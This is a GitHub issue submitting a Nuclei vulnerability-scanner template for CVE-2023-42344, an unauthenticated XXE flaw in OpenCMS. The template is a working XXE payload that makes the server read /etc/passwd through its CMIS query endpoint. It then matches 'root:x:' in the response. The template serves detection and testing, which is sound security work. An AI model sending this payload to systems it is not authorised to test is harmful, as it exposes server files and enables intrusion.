### ISSUE TITLE
CVE-2023-42344.yaml

### ISSUE THREAD

**Issue by Kro0oz** [projectdiscovery/nuclei-templates#8864]
### Template Information:
reference
https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/

### Nuclei Template:

```yaml
id: CVE-2023-42344
info:
  name: XXE in OpenCMS (CVE-2023-42344)
  author: 1337kro
  severity: high
  reference: https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/

http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
    headers:
      Content-Type: application/cmisquery+xml
    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
    matchers:
      - type: word
        words:
          - "root:x:"
        part: body

```
